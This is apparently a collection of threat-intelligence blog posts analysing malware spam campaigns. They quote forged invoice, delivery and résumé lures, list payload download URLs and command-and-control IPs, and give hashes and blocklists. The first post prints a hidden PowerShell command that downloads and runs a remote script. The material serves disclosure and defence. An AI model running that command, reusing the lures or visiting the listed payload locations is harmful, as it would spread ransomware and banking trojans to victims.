Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery

Your Order Information
Prices include VAT at 20%

Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all

So.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204

Malware spam: "Scanned image" leads to Locky

This fake document scan appears to come from within the victim's own domain but has a malicious attachment.

From:    administrator8991@victimdomain.com
Date:    5 July 2016 at 12:47
Subject:    Scanned image

Image data has been attached to this email.

Possibly due to an error in setting up the spam run, there is an attachment named 05-07-2016_rndnum(4,9)}}.docm which contains a malicious macro. We haven't seen much in the way of Word-based malware recently. The two samples I received have VirusTotal detection rates of 5/52 and 6/52. The Malwr analysis for those samples [1] [2] shows the macro downloading a binary from:

leafyrushy.com/98uhnvcx4x
sgi-shipping.com/98uhnvcx4x

There will be a lot more locations too. This drops a binary with a detection rate of 5/55 which appears to be Locky ransomware. Hybrid Analysis shows it phoning home to:

185.106.122.38 (Host Sailor, Romania / UAE)
185.106.122.46 (Host Sailor, Romania / UAE)
185.129.148.6 (MWTV, Latvia)

Host Sailor is a notoriously Black Hat web host, MWTV has is problems too. The payload appears to be be Locky ransomware.

Recommended blocklist:
185.106.122.0/24
185.129.148.0/24

Malware spam: "Good morning" résumé spam drops Cerber ransomware and makes a statement

This fake résumé spam leads to malware:

From:    Dora Bain
Date:    7 June 2016 at 03:37
Subject:    Good morning

What's Up?
I visited your website today..
I'm currently looking for work either full time or as a intern to get experience in the field.
Please look over my CV and let me know what you think.

With gratitude,

--
Dora Bain

In the sample I saw, the attached file was named Dora-Resume.doc and had a VirusTotal detection rate of 11/56. The Malwr report and Hybrid Analysis show that a script executes that tries to make a political statement along the way..

This downloads a file from 80.82.64.198/subid1.exe which is then saved as %APPDATA%\us_drones_kills_civilians.exe  which VirusTotal gives a detection rate of 20/56 and seems to give an overall diagnosis as being Cerber ransomware.

The IP address of 80.82.64.198 is allocated to an apparent Seychelles shell company called Quasi Networks Ltd (which is probably Russian). There seems to be little if anything of value in 80.82.64.0/24 which could be a good candidate to block. Incidentally, the IP hosts best-booters.com which is likely to be a DDOS-for-hire site.

According to the VT report the malware scans for a response on port 6892 on the IP addresses 85.93.0.0 through to 85.93.63.255. However, this Hybrid Analysis indicates that the only server to respond is on 85.93.0.124 (GuardoMicro SRL, Romania) which is part of the notoriously bad 85.93.0.0/24 which is a good thing to block.

That report also shows traffic to ipinfo.io which is a legitimate "what is my IP" service. While not malicious in its own right, it does make a potentially good indicator of compromise.

Recommended blocklist:
80.82.64.0/24
85.93.0.0/24

Malware spam: "New Company Order" / "ABC Import & Export,LLC"

This fake financial spam leads to malware:

From:    accounting@abcimportexport.com
Reply-To:    userworldz@yahoo.com
To:    Recipients [accounting@abcimportexport.com]
Date:    31 May 2016 at 12:31
Subject:    New Company Order

Good Day,

Find the attached specifications in the purchase order for our company mid year order & projects before sending your Proforma Invoice and do get back to me with your quotations asap.
An Official order placement will follow as soon as possible.

CLICK HERE TO DOWNLOAD & VIEW PURCHASE ORDER IF DOESNT WORK THEN CLICK HERE TO DOWNLOAD SECURE PURCHASE ORDER 

https://gallery.mailchimp.com/4dcdbc9b7e95edf6788be6723/files/scan_purchase_orders.zip
Attention! This document was created with a newer version of Microsoft Word.. Please click Enable Content or Macro to view the content of our order

Best Regards,
Ameen La Binish

Purchasing Dept

ABC Import & Export,LLC 2534 Royal Lane
Suite # 205
Dallas,Texas 75229
USA
Toll Free : 1-800-666-5874
Office Main Line : 1-214-966-2627
Office Reception : 1-214-985-1696
Fax : 1-972-243-7275
Email: Sales@abcimportexports.co
Website: http://abcimportexport.com

This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message and are hereby notified that any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited.

The link in the email message goes to gallery.mailchimp.com/4dcdbc9b7e95edf6788be6723/files/scan_purchase_orders.zip . This contains a malicious executable scan purchase orders.exe which has a detection rate of 3/56. That VirusTotal report and these other analyses [1] [2] [3] shows network traffic to:

185.5.175.211 (Voxility SRL, Romania)

This executable drops another similar EXE [4] [5] [6] [7] which phones home to the same IP. Between them, these reports indicate some sort of keylogger. There seems to be little of anything of value in this /24, so I would recommend blocking 185.5.175.0/24

sdfsdaf

Malware spam: "As promised, the document you requested is attached" leads to Locky

This fairly brief spam has a malicious attachment:

From:    Alexandra Nunez
Date:    10 May 2016 at 21:10
Subject:    Re:

hi [redacted],

As promised, the document you requested is attached

Regards,

Alexandra Nunez

The name of the sender varies. Attached is a ZIP file with a name export_xls_nnn.zip or wire_xls_nnn.zip (where nnn are random letters and numbers) which contains multiple copies of the same malicious .js file (all apparently beginning urgent). These scripts download slightly different binaries from several locations including:


4hotdeals.com.au/j47sfe
stationerypoint.com.au/cnb3kjd
floranectar.com.au/er5tsd
togopp.com/vbg5gf
printjuce.com/rt5tdf
designitlikeal.com/cvb3ujd

There are probably many more download locations.

The typical detection rate for these binariesis about 12/56 [1] [2] [3] [4] [5] and automated analysis [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] shows network traffic to:

5.34.183.40 (ITL, Ukraine)
185.82.202.170 (Host Sailor, United Arab Emirates / Romania)
185.14.28.51 (ITL, Netherlands)
92.222.71.26 (OVH, France)
88.214.236.11 (Overoptic Systems, UK / Russia)

The payload is Locky ransomware

Recommended blocklist:
5.34.183.40
185.82.202.170
185.14.28.51
92.222.71.26
88.214.236.11

Malware spam: "Attached Doc" / "Attached Image" / "Attached Document" / "Attached File"

This fake document scan email appears to come from within the victim's own domain, but it doesn't. Instead it is a simple forgery with a malicious attachment.

Example subjects include:

Attached Doc
Attached Image
Attached Document
Attached File

Example senders:

epson@victimdomain.tld
scanner@victimdomain.tld
xerox@victimdomain.tld

There is no body text. Attached is a ZIP file with the recipients email address forming part of the name plus a couple of random numbers. These ZIP files contain a variety of malicious scripts, the ones that I have seen download a binary from:

emcartaz.net.br/08j78h65e
kizilirmakdeltasi.net/08j78h65e
easytravelvault.com/08j78h65e
64.207.144.148/08j78h65e
cdn.cs2.pushthetraffic.com/08j78h65e

The VirusTotal detection rate for the dropped binary is 3/55. That VirusTotal report and this Hybrid Analysis show subsequent traffic to:

giotuipo.at/api/
giotuipo.at/files/dDjk3e.exe
giotuipo.at/files/VTXhFO.exe

The payload is Locky ransomware. This is hosted on what appears to be a bad server at:

134.249.238.140 (Kyivstar GSM, Ukraine)

Kyivstar is a GSM network, something hosted on this IP is usually a sure sign of a botnet. A lookup of the giotuipo.at domain shows that it is multihomed on many IPs:

109.194.247.26 (ER-Telecom Holding, Russia)
95.189.128.70 (Sibirtelecom, Russia)
79.119.196.161 (RCS & RDS Business, Romania)
5.248.229.186 (Lanet Network Ltd, Ukraine)
188.230.17.38 (Airbites, Ukraine)
134.249.238.140 (Kyivstar, Ukraine)
5.58.29.200 (Lanet Network Ltd, Ukraine)
212.3.103.225 (Apex, Ukraine)
93.95.187.243 (Triolan, Ukraine)
178.151.243.153 (Triolan, Ukraine)

These IPs are likely to be highly dynamic, so blocking them may or may not work. If you want to try, here is a recommended blocklist:

109.194.247.26
95.189.128.70
79.119.196.161
5.248.229.186
188.230.17.38
134.249.238.140
5.58.29.200
212.3.103.225
93.95.187.243
178.151.243.153

Malware spam: "12/16 A Invoice"

This fake financial spam leads to malware:

From:    Kelley Small
Date:    17 December 2015 at 08:39
Subject:    12/16 A Invoice

Hi,
Please find attached a recharge invoice for your broadband.

Many thanks,
Kelley Small

The sender's name is randomly generated, for example:

Harris Page
Leonel Kramer
Gracie Fuentes
Earlene Aguirre
Jerri Whitfield
Art Keith
Freeman Gregory
Moses Larson
Leanna Fletcher

There is an attachment in the format invoice36649009.doc where the number is randomly generated. This comes in at least six different versions but they do not appear to be uniquely generated (VirusTotal results [1] [2] [3] [4] [5] [6] [7]). Detection rates are close to zero.

The Malwr reports for those documents is a mixed bag [1] [2] [3] [4] [5] [6] [7] is a mixed bag, but overall they spot data being POSTed to:

179.60.144.18/chicken/bacon.php
91.203.5.169/chicken/bacon.php

Sources tell me there is another download location of:

195.191.25.145/chicken/bacon.php

Those IPs are likely to be malicious and belong to:

179.60.144.18 (Veraton Projects Ltd, Netherlands)
91.203.5.169 (Denis Pavlovich Semenyuk / TutHost, Ukraine)
195.191.25.145 (Hostpro Ltd, Ukraine)


They also GET from:

savepic.su/6786586.png

A file karp.exe  is dropped with an MD5 of 1fbf5be463ce094a6f7ad345612ec1e7 and a detection rate of 3/54. According to this Malwr report this communicates with:

80.96.150.201 (SC-Nextra Telecom SRL, Romania)

It's not clear what the payload is, but probably some sort of banking trojan such as Dridex.

MD5s:
1FBF5BE463CE094A6F7AD345612EC1E7
69F7AFB14E0E6450C4D122C53365A048
1A4048FA8B910CE6620A91A630B32CF6
7034285D8AA1EC84CFDFF530069ECF77
E0019B311E0319AB3C79C5CDAF5A067D
D08BC2E90E6BB63FB4AEBA63C0E298F4
3ED7EDC00C2C62548B83BCDAAA43C47A
B9D135801A8008EA74584C3DEB1BE8D4

Recommended blocklist:
80.96.150.201
179.60.144.18
91.203.5.169
195.191.25.145
savepic.su

UPDATE 12/1/16 

The same message format is being used for another attack with a slightly different payload, which is the same as used in this spam run.

Malware spam: "Israel Burke" / "BCP Transportation, Inc."

This fake invoice comes with a malicious attachment:

From:    Israel Burke [BurkeIsrael850@business.telecomitalia.it]
Date:    14 December 2015 at 15:00
Subject:    Israel Burke

Dear Customer:

Attached please find an invoice(s) for payment.  Please let us know if you have any questions.

We greatly appreciate your business!

Israel Burke
BCP Transportation, Inc.

I have only seen one sample of this, it is possible that the company name and sender names are randomly generated. The attachment in this case was named invoice_scan_76926455.doc and has a detection rate of 3/55.

Despite the name, this is not a Word document but is an XML document [pastebin] containing ActiveMIME data. The Malwr report for this indicates network traffic to:

109.234.34.224 (McHost.Ru, Russia)
80.96.150.201 (SC-Nextra Telecom SRL, Romania)

That Malwr report shows a dropped binary named qqqew.exe which has a VirusTotal detection rate of 5/55.

I am not certain of the payload, but I suspect that this Word document is dropping Upatre leading to the Dyre banking trojan.

MD5s:
a81a19478dbe13778f06191cf39c8143
5b1db9050cc44db3a99b50a5ba9d902a

Recommended blocklist:
109.234.34.224
80.96.150.201

Malware spam: "Purchase Order 124658" / "Gina Harrowell [gina.harrowell@clinimed.co.uk]"

This fake financial spam is not from CliniMed Limited but is instead a simple forgery with a malicious attachment:

From     Gina Harrowell [gina.harrowell@clinimed.co.uk]
Date     Wed, 02 Dec 2015 01:53:41 -0700
Subject     Purchase Order 124658

Sent 2 DEC 15 09:18

CliniMed Ltd
Cavell House
Knaves Beech Way
Loudwater
High Wycombe
Bucks
HP10 9QY

Telephone 01628 850100
Fax 01628 850331

From:                    CliniMed Limited

Company Registration No: 01646927

Registered Office:       Cavell House, Knaves Beech Way,
                         Loudwater, High Wycombe, Bucks, HP10 9QY

The contents of this e-mail are confidential to the sender and the addressee. If
you are not the addressee, or responsible for delivering to the addressee, please
notify us immediately by telephoning our IT Support on 01628 850100 (UK) or +44 1628
850100 (international) and delete the message from your computer without copying
or forwarding it or disclosing its contents to any other party. CliniMed Limited
cannot accept any responsibility for changes made to this message after it was sent
and you should not rely on information given in the message without obtaining written
confirmation. It is the responsibility of the addressee to scan incoming mail for
viruses and CliniMed Limited accepts no liability or responsibility for viruses.
Opinions expressed in this e-mail are those of the sender and may not reflect the
opinions and views of CliniMed Limited.

Attached is a file P-ORD-C-10156-124658.xls which I have seen two versions of (VirusTotal results [1] [2]) which contain a malicious macro that looks like this [pastebin] which according to these automated analysis reports [3] [4] [5] [6] pulls down an evil binary from:

det-sad-89.ru/4367yt/p0o6543f.exe
vanoha.webzdarma.cz/4367yt/p0o6543f.exe

There may be other versions of the Excel document with different download locations, but the payload will be the same. This has a VirusTotal detection rate of 1/55  and those previous reports plus this Malwr report indicate malicious network traffic to the following IPs:

193.238.97.98 (PJSC Datagroup, Ukraine)
94.73.155.12 (Cizgi Telekomunikasyon Anonim Sirketi, Turkey)
89.32.145.12 (Elvsoft SRL, Romania / Coreix, UK)

The payload is probably the Dridex banking trojan.

MD5s:
9e1bac7de9a3d2640c8342ba885f9fac
ad78358aa34f2208cde5b63fa27987ef
6fa491ea0bab9f6213329c4c010b27fe

Recommended blocklist:
193.238.97.98
94.73.155.8/29
89.32.145.12

Malware spam: "Request for payment (PGS/73329)" / "PGS Services Limited [rebecca@pgs-services.co.uk]"

This spam email is confused. It's either about a watch repair or property maintenance. In any case, it has a malicious attachment:

From: PGS Services Limited [rebecca@pgs-services.co.uk]
Date: 1 December 2015 at 12:06
Subject: Request for payment (PGS/73329)


Dear Customer,
We are contacting you because there is an invoice on your account that is overdue for payment and although we have contacted you already our system is still showing that the invoice remains unpaid.

RST Support Services Limited
Rotary Watches Ltd
2 Fouberts Place
London

W1F 7PA
Full details are attached to this email in DOC format.

Click here to make a payment

If there is any reason why payment should not be made or if you are experiencing difficulties with making the payment please get in touch so that we can discuss the matter and stop the recovery process.
Kind regards,
Rebecca Hughes
Customer services team
PGS Services | Expert Property Care
Direct dial: 0203 819 7054
Email: rebecca@pgs-services.co.uk
Visit our website: www.pgs-services.co.uk
10 quick questions - tell us what you think!
http://www.pgs-services.co.uk/feedback/

Attached is a file 3-6555-73329-1435806061-3.doc which comes in at least three different versions (VirusTotal results [1] [2] [3]) and these Malwr reports [4] [5] [6] indicate that it downloads a malicious binary from the following locations:

rotulosvillarreal.com/~clientes/6543f/9o8jhdw.exe
cru3lblow.xf.cz/6543f/9o8jhdw.exe
data.axima.cz/~krejcir/6543f/9o8jhdw.exe

This binary has a detection rate of 2/55. According to this Malwr report and this Hybrid Analysis report, it phones home to some familiar and very bad IPs:

94.73.155.12 (Cizgi Telekomunikasyon Anonim Sirketi, Turkey)
89.32.145.12 (Elvsoft SRL, Romania / Coreix, UK)
221.132.35.56 (Ho Chi Minh City Post and Telecom Company, Vietnam)
157.252.245.29 (Trinity College Hatford, US)

The payload is probably the Dridex banking trojan.

MD5s:
6171b6272b724e8c19079b5b76bcc100
00312e3379db83bcf9008dd92dc72c2f
d1a401e07f3cab9488d41d509444309f
a4dcd843f545e02ce664157b61cb6191

Recommended blocklist:
94.73.155.8/29
89.32.145.12
221.132.35.56
157.252.245.29

Malware spam: "INTUIT QB" / "QUICKBOOKS ONLINE [qbservices@customersupport.intuit.com]" leads to ransomware

This fake Intuit QuickBooks spam leads to malware:

From:    QUICKBOOKS ONLINE [qbservices@customersupport.intuit.com]
Date:    30 November 2015 at 10:42
Subject:    INTUIT QB


As of November 5th, 2015, we will be updating the browsers we support. We encourage you to upgrade to the latest version for the best online experience. Please proceed the following link, download and install the security update for all supported browsers to be on top with INTUIT online security!

InTuIT. | simplify the business of life

© 2015 Intuit Inc. All rights reserved. Intuit and QuickBooks are registered trademarks of Intuit Inc. Terms and conditions, features, support, pricing, and service options subject to change without notice. 

The spam is almost identical to this one which led to Nymaim ransomware.

In this particular spam, the email went to a landing page at updates.intuitdataserver-1.com/sessionid-7ec395d0628d6799669584f04027c7f6 which then attempts to download a fake Firefox update. 

This executable has a VirusTotal detection rate of 3/55, the MD5 is 592899e0eb3c06fb9fda59d03e4b5b53. The Hybrid Analysis report shows the malware attempting to POST to mlewipzrm.in which is multihomed on:

89.163.249.75 (myLoc managed IT AG, Germany)
188.209.52.228 (BlazingFast LLC, Ukraine / NForce Entertainment, Romania)
95.173.164.212 (Netinternet Bilgisayar ve Telekomunikasyon San. ve Tic. Ltd. Sti., Turkey)

The nameservers for mlewipzrm.in are NS1.REBELLECLUB.NET and NS2.REBELLECLUB.NET which are hosted on the following IPs:

210.110.198.10 (KISTI, Korea)
52.61.88.21 (Amazon AWS, US)

These nameservers support the following malicious domains:

exstiosgen.com
ecestioneng.com
densetsystem.com
deseondefend.com
xonstensetsat.com
dledisysteming.com
thecertisendes.com
georgino.net
tangsburan.net
rebelleclub.net
helpagregator.net

The download location uses a pair of nameservers, NS1.MOMEDEFER.PW and NS1.PRIZEBROCK.PW. If we factor in the NS2 servers as well, we get a set of malicious IPs:

5.135.237.209 (OVH, France)
196.52.21.11 (LogicWeb, US / South Africa)
75.127.2.116 (Foroquimica SL / ColoCrossing, US)

These nameservers support the following malicious domains:

browsersecurityupdates.com
intuit-browsersecurity.com
intuit-browserupdate.com
intuitdataserver.com
intuitdataserver1.com
intuitdataserver-1.com
intuitinstruments.com
intuit-security.com
intuitsecuritycenter.com
intuitsecurityupdates.com
intuit-securityupdates.com
intuit-updates.com
intuitupdates-1.com
security-center1.com
securitycentral1.com
securitycentral-1.com
securityserver-2.com
securityupdateserver-1.com
updates-1.com
updateserver-1.com

As far as I can tell, these domains are hosted on the following IPs:

52.91.28.199 (Amazon AWS, US)
213.238.170.217 (Eksen Bilisim, Turkey)
75.127.2.116 (Foroquimica SL / ColoCrossing, US)

I recommend that you block the following IPs and/or domains:

52.91.28.199
213.238.170.217
5.135.237.209
196.52.21.11
75.127.2.116
210.110.198.10
52.61.88.21
89.163.249.75
188.209.52.228
95.173.164.212
mlewipzrm.in
exstiosgen.com
ecestioneng.com
densetsystem.com
deseondefend.com
xonstensetsat.com
dledisysteming.com
thecertisendes.com
georgino.net
tangsburan.net
rebelleclub.net
helpagregator.net
browsersecurityupdates.com
intuit-browsersecurity.com
intuit-browserupdate.com
intuitdataserver.com
intuitdataserver1.com
intuitdataserver-1.com
intuitinstruments.com
intuit-security.com
intuitsecuritycenter.com
intuitsecurityupdates.com
intuit-securityupdates.com
intuit-updates.com
intuitupdates-1.com
security-center1.com
securitycentral1.com
securitycentral-1.com
securityserver-2.com
securityupdateserver-1.com
updates-1.com
updateserver-1.com
momedefer.pw
prizebrock.pw

Malware spam: "Abcam Despatch [CCE5303255]" / orders@abcam.com

I don't have the body text to this particular message, but it is not actually from Abcam. Instead it is a simple forgery with a malicious attachment.

From     orders@abcam.com
Date     Tue, 24 Nov 2015 13:48:14 +0300
Subject     Abcam Despatch [CCE5303255]

The attachment name is invoice_1366976_08-01-13.xls and it comes in at least two versions (VirusTotal [1] [2]) containing a malicious macro like this [pastebin] which downloads from the following locations (there may be more):

biennalecasablanca.ma/7745gd/4dgrgdg.exe
villmarkshest.no/7745gd/4dgrgdg.exe

This binary has a detection rate of 2/55 and phones home to the following IPs (according to this):

157.252.245.32 (Trinity College Hartford, US)
89.108.71.148 (Agava Ltd, Russia)
89.32.145.12 (Elvsoft SRV, Romania / Coreix, UK)

MD5s:
00ac8683e56102928e825f8d71b15473
2e22d61bed8c1aafaef7700c5b1f26c2
87f0a43f81efa9fb3ff26b83ec831248

Recommended blocklist:
157.252.245.32
89.108.71.148
89.32.145.12

Malware spam: "Scan as requested" / "Melissa O'Neill" [adminoldbury@newhopecare.co.uk]

This fake document scan does not come from New Hope Specialist Care but is instead a simple forgery with a malicious attachment:

From     "Melissa O'Neill" [adminoldbury@newhopecare.co.uk]
Date     Tue, 24 Nov 2015 07:11:00 -0300
Subject     Scan as requested

Regards


Paulette Riley

Administrator

New Hope Specialist Care Ltd
126 Brook Road
Oldbury
West Midlands
B68 8AE

tel: 0121 552 1055
mobile: 07811 486 270
fax: 0121 544 7104


* PLEASE CONSIDER THE ENVIRONMENT BEFORE PRINTING THIS EMAIL *


This is an email from New Hope Specialst Care Ltd. The information contained
within this message is intended for the addressee only and may contain
confidential and/or privilege information. If you are not the intended
recipient you may not peruse, use, disseminate, distribute or copy this
message. If you have received this message in error please notify the sender
immediately by email or telephone and either return or destroy the original
message. New Hope Specialsit Care Ltd accept no responsibility for any
changes made to this message after it has been sent by the original author.
The views contained herein do not necessarily represent the views of New
Hope Specialist Care Ltd This email or any of its attachments may contain
data that falls within the scope of the Data Protection Acts. You must
ensure that handling or processing of such data by you is fully compliant
with the terms and provisions of the Data Protection Act 1984 and 1988

---
This email has been checked for viruses by Avast antivirus software.
http://www.avast.com

Attached is a file 20151009144829748.doc of which I have seen two versions (VirusTotal results [1] [2]) and which contain a macro like this [pastebin].

Analysis of these documents is pending, but the payload is likely to be the Dridex banking trojan.

Frustratingly, it looks like the web host has suspended newhopecare.co.uk which is not helpful in these circustances, as it stops the victim company from posting a warning.

UPDATE

These two Hybrid Analysis reports [1] [2] show a download from the following locations:

www.costa-rica-hoteles-viajes.com/~web/7745gd/4dgrgdg.exe
janaduchanova.wz.cz/7745gd/4dgrgdg.exe

This has a VirusTotal detection rate of 4/55. That VT analysis and this Malwr analysis and these two Hybrid Analysis reports [1] [2] show network traffic to:

157.252.245.32 (Trinity College Hartford, US)
89.108.71.148 (Agava Ltd, Russia)
89.32.145.12 (Elvsoft SRV, Romania / Coreix, UK)
88.86.117.153 (SuperNetwork, Czech Republic)

MD5s:
06c1c0a6d5482b93737f9ce250161b82
3368d7d4f48d291ee0f4ae7c81dd73a6
15fcf405b726379c6efabc89d6e0ceac

Recommended blocklist:
157.252.245.32
89.108.71.148
89.32.145.12
88.86.117.153

Malware spam: "UKMail 988271023 tracking information" / no-reply@ukmail.com

NOTE:  as of 22nd January 2016, a new version of this spam email is in circulation, described here.

This fake delivery email does not come from UKMail but is instead a simple forgery with a malicious attachment:

From:    no-reply@ukmail.com
Date:    23 November 2015 at 11:06
Subject:    UKMail 988271023 tracking information

UKMail Info!
Your parcel has not been delivered to your address November 23, 2015, because nobody was at home.
Please view the information about your parcel, print it and go to the post office to receive your package.

Warranties
UKMail expressly disclaims all conditions, guarantees and warranties, express or implied, in respect of the Service.
Where the law prevents such exclusion and implies conditions and warranties into this contract,
where legally permissible the liability of UKMail for breach of such condition,
guarantee or warranty is limited at the option of UKMail to either supplying the Service again or paying the cost of having the service supplied again.
If you don't receive a package within 30 working days UKMail will charge you for it's keeping.
You can find any information about the procedure and conditions of parcel keeping in the nearest post office.

Best regards,
UKMail

The attachment is named 988271023-PRCL.doc and so far I have come across three different versions of this (VirusTotal results [1] [2] [3]), containing a malicious macro like this [pastebin] which according to these Hybrid Analysis reports [4] [5] [6] downloads a malware binary from the following locations:

www.capodorlandoweb.it/u654g/76j5h4g.exe
xsnoiseccs.bigpondhosting.com/u654g/76j5h4g.exe
cr9090worldrecord.wz.cz/u654g/76j5h4g.exe

This binary has a VirusTotal detection rate of 5/54. That VirusTotal report plus this Hybrid Analysis report and Malwr report indicate malicious traffic to the following IPs:

157.252.245.32 (Trinity College Hartford, US)
89.32.145.12 (Elvsoft SRV, Romania / Coreix, UK)
89.108.71.148 (Agava Ltd, Russia)
91.212.89.239 (UZINFOCOM, Uzbekistan)
89.189.174.19 (Sibirskie Seti, Russia)
122.151.73.216 (M2 Telecommunications, Australia)
37.128.132.96 (Memset Ltd, UK)
195.187.111.11 (SGGW, Poland)
37.99.146.27 (Etihad Atheeb Telecom Company, Saudi Arabia)
77.221.140.99 (Infobox.ru, Russia)
195.251.145.79 (University Of The Aegean, Greece)

The payload is likely to be the Dridex banking trojan.

MD5s:
37f025e70ee90e40589e7a3fd763817c
3e25ba0c709f1b9e399e228d302dd732
e6f1003e4572691493ab1845cb983417
5b6c01ea40acfb7dff4337710cf0a56c

Recommended blocklist:
157.252.245.32
89.32.145.12
89.108.71.148
91.212.89.239
89.189.174.19
122.151.73.216
37.128.132.96
195.187.111.11
37.99.146.27
77.221.140.99
195.251.145.79

Malware spam: "Employee Documents – Internal Use" / Employee Documents(1928).xls

This spam appears to come from the "HR@" email address in the potential victim's own domain, but it is instead a simple forgery with a malicious attachment.

From: HR@victimdomain
To: victim@victimdomain
Subject: Employee Documents – Internal Use
Date: Mon, 23 Nov 2015 16:23:41 +0530

Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: Quoted-Printable

DOCUMENT NOTIFICATION, Powered by NetDocuments

DOCUMENT NAME: Employee Documents

DOCUMENT LINK: [Link removed]

Attached is a file Employee Documents(1928).xls although I have had some difficulty acquiring a copy. However, my sources tell me that there are three different versions downloading from the following locations:

kunie.it/u654g/76j5h4g.exe
oraveo.com/u654g/76j5h4g.exe
www.t-tosen.com/u654g/76j5h4g.exe

The downloaded binary has a detection rate of just 1/54. That VirusTotal report and this Hybrid Analysis report show network connections to the following IPs:

89.108.71.148 (Agava Ltd, Russia)
89.32.145.12 (Elvsoft SRV, Romania / Coreix, UK)
157.252.245.32 (Trinity College Hartford, US)

The payload is probably the Dridex banking trojan.

MD5s:
127f12a789c145ed05be36961376999e
c57bc09009a925a02fde6a6b58f988b3
bb62d7bc330a2e2452f773500428574c
a178d8d94238977b0c367dc761d9c7de

Recommended blocklist:
89.108.71.148
89.32.145.12
157.252.245.32

Malware spam: "Reprint Document archive" / "tracey.beedles@eurocarparts.com"

This fake financial spam does not come from Euro Car Parts but is instead a simple forgery with a malicious attachment.

From     tracey.beedles@eurocarparts.com
Date     Fri, 20 Nov 2015 18:49:06 +0700
Subject     Reprint Document archive

Attached is a Print Manager form.
Format = Word Document Format File (DOC)

The attachment is named pmB3A6.doc and it comes in at least four different versions (VirusTotal results [1] [2] [3] [4]) and it contains a malicious macro like this [pastebin] which according to these Hybrid Analysis results [5] [6] [7] [8] downloads a malicious binary from one of the three following locations:

pr-clanky.kvalitne.cz/65y3fd23d/87i4g3d2d2.exe
